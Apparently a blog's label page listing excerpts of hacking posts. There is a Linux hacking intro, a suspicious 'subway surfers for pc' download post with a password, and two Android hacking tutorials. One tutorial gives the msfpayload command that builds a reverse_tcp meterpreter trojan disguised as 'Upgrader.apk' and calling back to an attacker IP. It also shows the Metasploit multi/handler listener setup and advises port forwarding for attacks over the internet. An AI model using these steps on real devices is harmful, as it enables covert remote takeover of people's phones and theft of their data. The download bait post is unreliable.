Posts

Showing posts with the label android

Learn to hack linux

Image
Attack servers, crack passwords, exploit services, beat encryption - everything you need to protect yourself from evil. There are two rules of computer security: one – don’t buy a computer; and two – if you have to buy a computer, don’t turn it on. If you break these rules then you’ll be opening yourself up to potential problems. No system is 100% safe from hackers, but by following a few simple steps you can make yours much harder for intruders to attack. Hacking is the art of gaining access to a computer system that you’re not supposed to access. Its practitioners exploit bugs and glitches in software to make it perform in ways it’s not supposed to. We’ll look at two ways in which they do this, and show you how to stop yourself from becoming a victim. We’ll gain root access to a system that will enable us to do anything we wish – from stealing information to wiping the hard drives. The attacks are real and performed on actual Linux systems (though in one case we use an ...

subway surfers for pc is here

Image
<< Download here >> << DOWNLOAD HERE >> password is here: - cleaverfox@hackeraj <<COMMENT FAST>>

How to Hack Android Using Kali Linux

Image
How to Hack Android Using Kali Linux Hi, How to Hack Android Using Kali Linux. This is a tutorial explaining how to hack android phones with Kali.   Step 1: Fire-Up Kali: Open a terminal, and make a  Trojan  .apk You can do this by typing : msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk  (replace LHOST with your own IP) You can also hack android on  WAN i.e. through Interet  by using your Public/External IP  in the LHOST and by  port forwarding  (ask me about port forwarding if you have problems in the comment section) Step 2: Open Another Terminal: Open another terminal until the file is being produced. Load metasploit console, by typing :  msfconsole Step 3: Set-Up a Listener: After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler Set up a (reverse) payload by typing :  set payload android/meterpre...

Hacking Android Smartphone using Metasploit in Kali Linux

Image
What is android? according to  wikipedia : Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile  devices such as smartphones and tablet  computers . Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the  Open  Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices. Android application package file (APK) is  the file  format used to  distribute  and  install  application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a  Deb package  in Debian-based operating systems like Ubuntu. Here is some initial information for this  tutorial : Attacker IP address: 192.168.8.94 Attacker port to receive conn...